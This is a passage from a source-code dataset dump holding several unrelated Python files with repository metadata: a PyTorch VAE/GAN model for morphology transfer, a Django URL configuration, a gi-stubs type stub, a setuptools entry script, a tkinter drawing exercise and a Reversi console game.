] | permissive | fredericgo/rl_morph_pytorch | eafc36128e60296743a42b25d417efe17128ac93 | 743cd82d82c16c8d52e5265b6cc5cdf490cb8945 | refs/heads/main | 2023-07-11T05:51:43.914695 | 2021-08-09T02:54:06 | 2021-08-09T02:54:06 | 344,523,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,741 | py | import os
import torch
import torch.nn as nn
from torch.nn import functional as F
import torch.optim as optim
import numpy as np
from transformer_split.encoders import PoseEncoder
from transformer_split.decoder import Decoder
from transformer_split.discriminator import Discriminator
def kl_divergence(mu, logvar):
return - 0.5 * (1 + logvar - mu.pow(2) - logvar.exp()).mean()
def mse_loss(input, target):
return (input - target).pow(2).mean()
def frange_cycle_linear(start, stop, n_epoch, n_cycle=4, ratio=0.5):
L = np.ones(n_epoch)
period = n_epoch/n_cycle
step = (stop-start)/(period*ratio) # linear schedule
for c in range(n_cycle):
v , i = start , 0
while v <= stop and (int(i+c*period) < n_epoch):
L[int(i+c*period)] = v
v += step
i += 1
return L
class VAE_Model(nn.Module):
def __init__(self, args):
super(VAE_Model, self).__init__()
enc = PoseEncoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
decoder = Decoder(
root_size=args.root_size,
feature_size=args.dim_per_limb,
latent_size=args.latent_dim,
batch_size=args.batch_size,
ninp=args.attention_embedding_size,
nhead=args.attention_heads,
nhid=args.attention_hidden_size,
nlayers=args.attention_layers,
max_num_limbs=args.max_num_limbs,
dropout=args.dropout_rate
)
discriminator = Discriminator(
root_size=args.root_size,
feature_size=args.dim_per_limb,
max_num_limbs=args.max_num_limbs
)
self.add_module("enc", enc)
self.add_module("decoder", decoder)
self.add_module("discriminator", discriminator)
self.batch_size = args.batch_size
self.latent_dim = args.latent_dim
encoder_parameters = list(self.enc.parameters())
self.auto_encoder_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.ae_lr,
)
self.discriminator_optimizer = optim.Adam(
list(self.discriminator.parameters()),
lr=args.lr,
)
self.generator_optimizer = optim.Adam(
encoder_parameters + list(self.decoder.parameters()),
lr=args.lr,
)
self.beta = args.beta
self.device = torch.device("cuda" if args.cuda else "cpu")
self.root_size = args.root_size
self.discriminator_limiting_accuracy = args.discriminator_limiting_accuracy
self.gp_weight = args.gradient_penalty
self.beta_schedule = frange_cycle_linear(0, args.beta, args.epochs, 4, 1)
def _gradient_penalty(self, D, real_data, generated_data):
real_data = torch.cat(real_data, dim=-1)
generated_data = torch.cat(generated_data, dim=-1)
batch_size = real_data.size()[0]
d = int(real_data.size()[1] / 2)
# Calculate interpolation
alpha = torch.rand(batch_size, 1, device=real_data.device, requires_grad=True)
alpha = alpha.expand_as(real_data)
alpha = alpha.to(generated_data.device)
interpolated = alpha * real_data.data + (1 - alpha) * generated_data.data
interpolated = torch.split(interpolated, [d, d], dim=-1)
# Calculate probability of interpolated examples
prob_interpolated = D(*interpolated)
# Calculate gradients of probabilities with respect to examples
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=interpolated,
grad_outputs=torch.ones(prob_interpolated.size(),
device=real_data.device),
create_graph=True, retain_graph=True)[0]
# Gradients have shape (batch_size, num_channels, img_width, img_height),
# so flatten to easily take norm per example in batch
gradients = gradients.view(batch_size, -1)
# Derivatives of the gradient close to 0 can cause problems because of
# the square root, so manually calculate norm and add epsilon
gradients_norm = torch.sqrt(torch.sum(gradients ** 2, dim=1) + 1e-12)
# Return gradient penalty
return ((gradients_norm - 1) ** 2).mean()
def split_root_body(self, x):
x_root = x[:, :self.root_size]
x_body = x[:, self.root_size:]
return x_root, x_body
def transfer(self, x, structure):
x_root, x_body = self.split_root_body(x)
zp, zc, mean, logvar = self.enc(x_body)
xr = self.decoder(zp, zc, structure)
xr = torch.cat([x_root, xr], dim=-1)
return xr
def train_recon(self, x1, x2, structure, epoch):
self.auto_encoder_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
zp_1, zc_1, mean, logvar = self.enc(x1_body)
zp_2, zc_2, mean, logvar = self.enc(x2_body)
x1_r_body = self.decoder(zp_1, zc_2, structure)
x2_r_body = self.decoder(zp_2, zc_1, structure)
kl_loss = kl_divergence(mean, logvar).mean()
rec_loss1 = mse_loss(x1_r_body, x1_body)
rec_loss2 = mse_loss(x2_r_body, x2_body)
reconstruction_loss = rec_loss1 + rec_loss2
loss = reconstruction_loss + self.beta_schedule[epoch] * kl_loss
loss.backward()
torch.nn.utils.clip_grad_norm_(self.parameters(), 0.5)
self.auto_encoder_optimizer.step()
return rec_loss1, rec_loss1, kl_loss, self.beta_schedule[epoch], mean.mean(), logvar.mean()
def train_generator(self, x1, x3, structure3, epoch):
self.generator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x3_root, x3_body = self.split_root_body(x3)
# zc: class content
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
kl_loss = kl_divergence(mean, logvar).mean()
# True labels
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d1 = self.discriminator(x3_body, xr_13)
gen_loss_1 = F.cross_entropy(d1, true_labels)
z_random = torch.normal(0, 1,
size=(self.batch_size, self.latent_dim),
device=x1.device)
xr_r3 = self.decoder(z_random, zc, structure3)
d2 = self.discriminator(x3_body, xr_r3)
gen_loss_2 = F.cross_entropy(d2, true_labels)
generator_loss = gen_loss_1 + gen_loss_2 + self.beta_schedule[epoch]* kl_loss
generator_loss.backward()
self.generator_optimizer.step()
return gen_loss_1, gen_loss_2, kl_loss
def train_discriminator(self, x1, x2, x3, structure3):
self.discriminator_optimizer.zero_grad()
x1_root, x1_body = self.split_root_body(x1)
x2_root, x2_body = self.split_root_body(x2)
x2_root, x3_body = self.split_root_body(x3)
true_labels = torch.ones(self.batch_size,
dtype=torch.long,
device=x1.device)
d_real = self.discriminator(x2_body, x3_body)
disc_loss_real = F.cross_entropy(d_real, true_labels)
fake_labels = torch.zeros(self.batch_size,
dtype=torch.long,
device=x1.device)
zp_1, zc, mean, logvar = self.enc(x1_body)
xr_13 = self.decoder(zp_1, zc, structure3)
d_fake = self.discriminator(x3_body, xr_13)
disc_loss_fake = F.cross_entropy(d_fake, fake_labels)
#gp = self.gp_weight * self._gradient_penalty(self.discriminator,
# (x2_body, x3_body),
# (x2_body, xr_13))
discriminator_loss = disc_loss_real + disc_loss_fake #+ gp
discriminator_loss.backward()
# calculate discriminator accuracy for this step
target_true_labels = torch.cat((true_labels, fake_labels), dim=0)
discriminator_predictions = torch.cat((d_real, d_fake), dim=0)
_, discriminator_predictions = torch.max(discriminator_predictions, 1)
discriminator_accuracy = (discriminator_predictions.data == target_true_labels.long()
).sum().item() / (self.batch_size * 2)
if discriminator_accuracy < self.discriminator_limiting_accuracy:
self.discriminator_optimizer.step()
return discriminator_loss, discriminator_accuracy
def save_model(self, path):
model_path = os.path.join(path, 'vae_model')
torch.save({
"encoder": self.enc.state_dict(),
"decoder": self.decoder.state_dict(),
"discriminator": self.discriminator.state_dict(),
}, model_path)
def load_model(self, path):
model_path = os.path.join(path, 'vae_model')
data = torch.load(model_path)
self.enc.load_state_dict(data['encoder'])
self.decoder.load_state_dict(data['decoder'])
self.discriminator.load_state_dict(data['discriminator']) | [
"[email protected]"
] | |
a6be9d570514b770b12cd026d69be6ad9174e1eb | 7c246e0046136c7ab200ebf5a7e8fe772bd0738b | /02_django/css01/css/urls.py | de2d2f568f2315ed7bcf65c575c4dcfdb29a1fdd | [] | no_license | name-chichi/KDT-BigData | d6d87557945b6dc5c3dd7126a718f6de147f6d7b | 6bac43fdaf0b0be94996f2fab65f59916d500395 | refs/heads/main | 2023-06-30T07:04:54.296238 | 2021-07-30T03:09:54 | 2021-07-30T03:09:54 | 374,502,002 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | """config URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from css import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home, name='home'),
path('html5', views.html5, name='html5'),
]
| [
"[email protected]"
] | |
93adf05fb8e78616581a275936e16a2c12ad1582 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/ZoomActionPrivate.py | 30f46ad6d498ed3b8d07dbaaa947fec7334f3b73 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,403 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class ZoomActionPrivate(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(ZoomActionPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'ZoomActionPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'ZoomActionPrivate' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(ZoomActionPrivate)
| [
"[email protected]"
] | |
49b7c6233cb3d031e79f2710167aae956de76e29 | 55a281d728541773e6eda896599c0cc48dfe5156 | /Advanced/venv/Scripts/easy_install-script.py | 8e473e4d78117e10d75b080582317f8367fd492a | [] | no_license | dhariskov/python-advanced | c0bebd937f3849dd62ae2834cbdf9f8100b2bb56 | 4725070c960d3c234ed2f20ff2156e2f89514a02 | refs/heads/master | 2022-12-04T22:40:18.485552 | 2020-08-28T08:29:25 | 2020-08-28T08:29:25 | 288,775,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 450 | py | #!C:\Users\Acer\PycharmProjects\Advanced\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | |
f636068a81116528616e1f63c07c412447c94e49 | c5be6a92f216957d340474b58507606a38c10f5f | /course-files/tutorials/tutorial04/answers/drawings/d5.py | e0e46a2f538962b9b15a80780794e0fa647bfa31 | [] | no_license | eecs110/winter2019 | 0b314c35e886b8099368ed7dfd51b707ab73c0c2 | f4107207ca1c9c10b78bdbb74fd82410b00ee363 | refs/heads/master | 2020-04-11T10:09:28.100445 | 2019-03-21T18:00:25 | 2019-03-21T18:00:25 | 161,705,160 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 860 | py | from tkinter import Canvas, Tk
import random
import shapes
import math
gui = Tk()
gui.title('Circle')
canvas = Canvas(gui, width=500, height=500, background='#FFFFFF')
canvas.pack()
########################## YOUR CODE BELOW THIS LINE ##############################
center_x = 250
center_y = 250
distance_from_center = 50
radius_of_individual_circle = 100
num_circles = 30
for i in range(num_circles):
# calculate new position of x and y
radians = 360 / num_circles * i * (math.pi / 180)
dy = distance_from_center * math.sin(radians)
dx = distance_from_center * math.cos(radians)
x = center_x + dx
y = center_y - dy
shapes.make_circle(canvas, (x, y), radius_of_individual_circle, color=None, outline='black', stroke_width=1)
########################## YOUR CODE ABOVE THIS LINE ##############################
canvas.mainloop() | [
"[email protected]"
] | |
83f402a7ec1b6a4bf2e2ac6f13ff695c108fcf0c | 44ff565bb1838a445e0d5a89ea3ca3e4b29b3686 | /Python算法详解/第12章/Reversi.py | 0a81667472893c1c0099a99a2e84e5b90021e743 | [] | no_license | huoweikong/python_pch_kiton | df3162aae397e82df9ef575f5f9d26039e5e036e | 057cef1f34c76701840e7b8b46a5955b9f38b86b | refs/heads/master | 2023-01-10T22:40:45.610986 | 2020-11-19T18:37:56 | 2020-11-19T18:37:56 | 313,897,428 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,262 | py | # Reversegam: a clone of Othello/Reversi
import random
import sys
WIDTH = 8 # Board is 8 spaces wide
HEIGHT = 8 # Board is 8 spaces tall
def drawBoard(board):
# This function prints the board that it was passed. Returns None.
print(' 12345678')
print(' +--------+')
for y in range(HEIGHT):
print('%s|' % (y+1), end='')
for x in range(WIDTH):
print(board[x][y], end='')
print('|%s' % (y+1))
print(' +--------+')
print(' 12345678')
def getNewBoard():
# Creates a brand-new, blank board data structure.
board = []
for i in range(WIDTH):
board.append([' ', ' ', ' ', ' ', ' ', ' ', ' ', ' '])
return board
def isValidMove(board, tile, xstart, ystart):
# 如果玩家在空间x上移动,则y无效,则返回false。 如果它是一个有效的移动,
# 则返回一个空格列表,如果玩家在这里移动的话,它们会变成玩家的列表。
if board[xstart][ystart] != ' ' or not isOnBoard(xstart, ystart):
return False
if tile == 'X':
otherTile = 'O'
else:
otherTile = 'X'
tilesToFlip = []
for xdirection, ydirection in [[0, 1], [1, 1], [1, 0], [1, -1], [0, -1], [-1, -1], [-1, 0], [-1, 1]]:
x, y = xstart, ystart
x += xdirection # First step in the x direction
y += ydirection # First step in the y direction
while isOnBoard(x, y) and board[x][y] == otherTile:
# 继续在这个XY方向前进 .
x += xdirection
y += ydirection
if isOnBoard(x, y) and board[x][y] == tile:
# 有一些东西翻转过来。沿着相反的方向走,直到我们到达原始空间,注意沿途所有的瓦片。
while True:
x -= xdirection
y -= ydirection
if x == xstart and y == ystart:
break
tilesToFlip.append([x, y])
if len(tilesToFlip) == 0: # 如果没有翻转瓦片,这不是有效的移动。.
return False
return tilesToFlip
def isOnBoard(x, y):
# 如果坐标位于板上,则返回true .
return x >= 0 and x <= WIDTH - 1 and y >= 0 and y <= HEIGHT - 1
def getBoardWithValidMoves(board, tile):
# 返回一个新的棋盘,标明玩家可以做出的有效动作。
boardCopy = getBoardCopy(board)
for x, y in getValidMoves(boardCopy, tile):
boardCopy[x][y] = '.'
return boardCopy
def getValidMoves(board, tile):
# 返回给定板上给定玩家的有效移动列表[x,y]
validMoves = []
for x in range(WIDTH):
for y in range(HEIGHT):
if isValidMove(board, tile, x, y) != False:
validMoves.append([x, y])
return validMoves
def getScoreOfBoard(board):
# 通过计算瓦片来确定分数。返回带有键x’和‘o’的字典。
xscore = 0
oscore = 0
for x in range(WIDTH):
for y in range(HEIGHT):
if board[x][y] == 'X':
xscore += 1
if board[x][y] == 'O':
oscore += 1
return {'X':xscore, 'O':oscore}
def enterPlayerTile():
# 让玩家键入他们想要的瓦片
# 返回一个列表,玩家的瓦片作为第一个项目,计算机的瓦片作为第二个.
tile = ''
while not (tile == 'X' or tile == 'O'):
print('Do you want to be X or O?')
tile = input().upper()
# The first element in the list is the player's tile, and the second is the computer's tile.
if tile == 'X':
return ['X', 'O']
else:
return ['O', 'X']
def whoGoesFirst():
# Randomly choose who goes first.
if random.randint(0, 1) == 0:
return 'computer'
else:
return 'player'
def makeMove(board, tile, xstart, ystart):
# Place the tile on the board at xstart, ystart, and flip any of the opponent's pieces.
# Returns False if this is an invalid move; True if it is valid.
tilesToFlip = isValidMove(board, tile, xstart, ystart)
if tilesToFlip == False:
return False
board[xstart][ystart] = tile
for x, y in tilesToFlip:
board[x][y] = tile
return True
def getBoardCopy(board):
# Make a duplicate of the board list and return it.
boardCopy = getNewBoard()
for x in range(WIDTH):
for y in range(HEIGHT):
boardCopy[x][y] = board[x][y]
return boardCopy
def isOnCorner(x, y):
# Returns True if the position is in one of the four corners.
return (x == 0 or x == WIDTH - 1) and (y == 0 or y == HEIGHT - 1)
def getPlayerMove(board, playerTile):
# Let the player enter their move.
# Returns the move as [x, y] (or returns the strings 'hints' or 'quit').
DIGITS1TO8 = '1 2 3 4 5 6 7 8'.split()
while True:
print('Enter your move, "quit" to end the game, or "hints" to toggle hints.')
move = input().lower()
if move == 'quit' or move == 'hints':
return move
if len(move) == 2 and move[0] in DIGITS1TO8 and move[1] in DIGITS1TO8:
x = int(move[0]) - 1
y = int(move[1]) - 1
if isValidMove(board, playerTile, x, y) == False:
continue
else:
break
else:
print('That is not a valid move. Enter the column (1-8) and then the row (1-8).')
print('For example, 81 will move on the top-right corner.')
return [x, y]
def getComputerMove(board, computerTile):
# Given a board and the computer's tile, determine where to
# move and return that move as a [x, y] list.
possibleMoves = getValidMoves(board, computerTile)
random.shuffle(possibleMoves) # randomize the order of the moves
# Always go for a corner if available.
for x, y in possibleMoves:
if isOnCorner(x, y):
return [x, y]
# Find the highest-scoring move possible.
bestScore = -1
for x, y in possibleMoves:
boardCopy = getBoardCopy(board)
makeMove(boardCopy, computerTile, x, y)
score = getScoreOfBoard(boardCopy)[computerTile]
if score > bestScore:
bestMove = [x, y]
bestScore = score
return bestMove
def printScore(board, playerTile, computerTile):
scores = getScoreOfBoard(board)
print('You: %s points. Computer: %s points.' % (scores[playerTile], scores[computerTile]))
def playGame(playerTile, computerTile):
showHints = False
turn = whoGoesFirst()
print('The ' + turn + ' will go first.')
# Clear the board and place starting pieces.
board = getNewBoard()
board[3][3] = 'X'
board[3][4] = 'O'
board[4][3] = 'O'
board[4][4] = 'X'
while True:
playerValidMoves = getValidMoves(board, playerTile)
computerValidMoves = getValidMoves(board, computerTile)
if playerValidMoves == [] and computerValidMoves == []:
return board # No one can move, so end the game.
elif turn == 'player': # Player's turn
if playerValidMoves != []:
if showHints:
validMovesBoard = getBoardWithValidMoves(board, playerTile)
drawBoard(validMovesBoard)
else:
drawBoard(board)
printScore(board, playerTile, computerTile)
move = getPlayerMove(board, playerTile)
if move == 'quit':
print('Thanks for playing!')
sys.exit() # Terminate the program.
elif move == 'hints':
showHints = not showHints
continue
else:
makeMove(board, playerTile, move[0], move[1])
turn = 'computer'
elif turn == 'computer': # Computer's turn
if computerValidMoves != []:
drawBoard(board)
printScore(board, playerTile, computerTile)
input('Press Enter to see the computer\'s move.')
move = getComputerMove(board, computerTile)
makeMove(board, computerTile, move[0], move[1])
turn = 'player'
print('Welcome to Reversegam!')
playerTile, computerTile = enterPlayerTile()
while True:
finalBoard = playGame(playerTile, computerTile)
# Display the final score.
drawBoard(finalBoard)
scores = getScoreOfBoard(finalBoard)
print('X scored %s points. O scored %s points.' % (scores['X'], scores['O']))
if scores[playerTile] > scores[computerTile]:
print('You beat the computer by %s points! Congratulations!' % (scores[playerTile] - scores[computerTile]))
elif scores[playerTile] < scores[computerTile]:
print('You lost. The computer beat you by %s points.' % (scores[computerTile] - scores[playerTile]))
else:
print('The game was a tie!')
print('Do you want to play again? (yes or no)')
if not input().lower().startswith('y'):
break
| [
"[email protected]"
] | |
0bc96e095f2069bc9811ef311b2dee119285ae92 | 9c88b828b783e23b50186a2cbba2c08610d8d10d | /espressodb/documentation/__init__.py | c16020e168c1d82085be018508a3cd3600a84a63 | [
"BSD-3-Clause"
] | permissive | remram44/espressodb | 9a51219c0e7ec6e4c400578d02b97ef95024ba1e | 5aad7222ab81c0f1694b51171e5d197dbcc8a65f | refs/heads/master | 2020-12-08T06:07:43.736419 | 2020-01-12T20:31:20 | 2020-01-12T20:31:20 | 232,909,755 | 0 | 0 | BSD-3-Clause | 2020-01-09T21:29:09 | 2020-01-09T21:29:08 | null | UTF-8 | Python | false | false | 170 | py | """The documentations module provides a web page which summarizes the implemented models
which derive from the EspressoDB :class:`espressodb.base.models.Base` class.
"""
| [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.